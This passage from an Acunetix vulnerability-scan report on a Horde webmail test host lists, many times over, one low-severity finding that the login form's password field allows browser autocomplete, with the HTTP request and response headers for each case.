Date: Sun, 22 May 2011 15:13:13 GMT
Content-Length: 10396
/imp/login.php (158764c7d282ec5f81da00419114f313)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Acunetix Website Audit65
Request
GET /imp/login.php?new_lang=%26%23x202d;Chinese%20(Traditional)%20(%26%23x6b63;%26%23x9ad4;%26%23x4e2d;%26%23x6587;) HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:22 GMT
Content-Length: 10190
/imp/login.php (1d46c5eb93aa7d11eef06bf0a0191c08)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/login.php?app=imp&horde_logout_token=9kdIZoVZfUu0i92_Wr0XpxEkycw&imapuser=kknytbhi&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10396
/imp/login.php (1d86503a775e69aaf8cfae2e3c4262b8)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
Acunetix Website Audit66
GET /imp/login.php?app=imp&horde_logout_token=8MnlK_AkVv_w-etJcyh00h3qZtk&imapuser=atsoewoc&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10396
/imp/login.php (218aabb29b4f5701fbeef27d6e22e8ae)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/login.php?new_lang=%26%23x202d;Bulgarian%20(%26%23x0411;%26%23x044a;%26%23x043b;%26%23x0433;%26%23x0430;%26%23x0440;%26%23x0441;%26%23x043a;%26%23x0438;) HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
Content-Length: 10191
/imp/login.php (28fc832e122bfd3d7aa0d9fc9e93c214)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
Acunetix Website Audit67
GET /imp/login.php?app=imp&horde_logout_token=fxkAiJl0cUvTGsyglzEAgwmsGvk&imapuser=bsximucj&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10396
/imp/login.php (2a85dcb007870d301225d725fb7aced5)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/login.php?app=imp&horde_logout_token=S9hLBWmjg9w-hz-Cez65kwSQFDI&imapuser=hkuhjfvd&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:10 GMT
Content-Length: 10396
/imp/login.php (36ce5744f27f6f06f85c2dac9f0ac09c)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
Acunetix Website Audit68
GET /imp/login.php?app=imp&horde_logout_token=rpo9s0fEQvr-PL8-6YEmPmL6eYE&imapuser=vhqsmkqh&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:13 GMT
Content-Length: 10396
/imp/login.php (3a784d3148a695e5246e4f7712293772)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/login.php?app=imp&horde_logout_token=4IdDEVByjuc3qQ9aCCZa_zV1Ju0&imapuser=lyoxhoba&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10396
/imp/login.php (4435f865242a495136a5f5376d63a435)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
Acunetix Website Audit69
GET /imp/login.php?app=imp&horde_logout_token=pdL5-YjGG7Nh5C6m9jNlmZpORww&imapuser=ivxkbmfl&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:13 GMT
Content-Length: 10396
/imp/login.php (4bff40967d6a993cb33f6ffe4f726c45)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/login.php?new_lang=%26%23x202d;Chinese%20(Simplified)%20(%26%23x7b80;%26%23x4f53;%26%23x4e2d;%26%23x6587;) HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
Content-Length: 10191
/imp/login.php (733b34e2771d847f3e677868a914fc27)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
Acunetix Website Audit70
GET /imp/login.php?app=imp&horde_logout_token=TDQA5rJjyTg4m99KcTR4_kGc2Ck&imapuser=ggqsiwfl&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10395
/imp/login.php (7f2892c38a099a99d15882e6395df8ed)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/login.php?new_lang=Dansk HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:22 GMT
Content-Length: 10191
/imp/login.php (81366dbb3a1b19d17070dae7247058f6)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/login.php?app=imp&horde_logout_token=YOAPl3vWsuqm_TL_FXgl0owpZmM&imapuser=iyeojwka
Acunetix Website Audit71
&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:13 GMT
Content-Length: 10396
/imp/login.php (8d2af24adeca98940d4ca72de057c259)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/login.php?new_lang=%26%23x202d;Arabic%20(Syria)%20%26%23x202e;(%26%23x0627;%26%23x0644;%26%23x0639;%26%23x0631;%26%23x0628;%26%23x064a;%26%23x0629;) HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
Content-Length: 10191
/imp/login.php (92d3a0adc0d0c42811b54244a0913050)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/login.php?app=imp&horde_logout_token=81ZHbgsWu6SDUtUtwCSI2FaJ-BE&imapuser=hurcfetk&logout_reason=badlogin&server=pop HTTP/1.1
Acunetix Website Audit72
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10395
/imp/login.php (98144b1b8c67561c22adeba83a43a266)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/login.php?app=imp&horde_logout_token=py6BVY4d7g6gx0ofFWB1kQ6hRdY&imapuser=sjtjgfnc&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10396
/imp/login.php (9b42f8057a8701d8c0448698f0d7a0ff)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/login.php?new_lang=Bahasa%20Indonesia HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix Website Audit73
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
Content-Length: 10191
/imp/login.php (a12e6bd4443144c1b8c23ea00c2ffe38)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/login.php?new_lang=Catal%26%23xe0; HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
Content-Length: 10191
/imp/login.php (a2ba6948a038d7a3a440afb1fc9eceed)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/login.php?new_lang=%26%23x010c;esky HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Acunetix Website Audit74
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
Content-Length: 10191
/imp/login.php (b0db092b89360e30820e995c6abbbc83)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/login.php?app=imp&horde_logout_token=g9u7H-78CHQyg9CQNPHaIUumuT8&imapuser=grwtfvif&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:13 GMT
Content-Length: 10395
/imp/login.php (b3cb8470038a18bddad7a22934963f28)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/login.php?app=imp&horde_logout_token=UVdJ_qdy2FCjlafyUTTJOJOjkUM&imapuser=tjmxnsfk&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Acunetix Website Audit75
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10396
/imp/login.php (b6658f01c57b6184aa9e241e81e8115a)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/login.php?app=imp&horde_logout_token=X15QsD-1zAYbNp-KXZCaCs97Ev4&imapuser=uwbkfapt&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10396
/imp/login.php (b80345ac9e258e2e5fc0788690b47d67)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
GET /imp/login.php?new_lang=Bosanski HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Acunetix Website Audit76
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
Content-Length: 10191
/imp/login.php (eb39b850bb307c9b610a48be2af0d636)
Details
Password type input named pass from form named imp_login with action http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php has autocomplete enabled.
Request
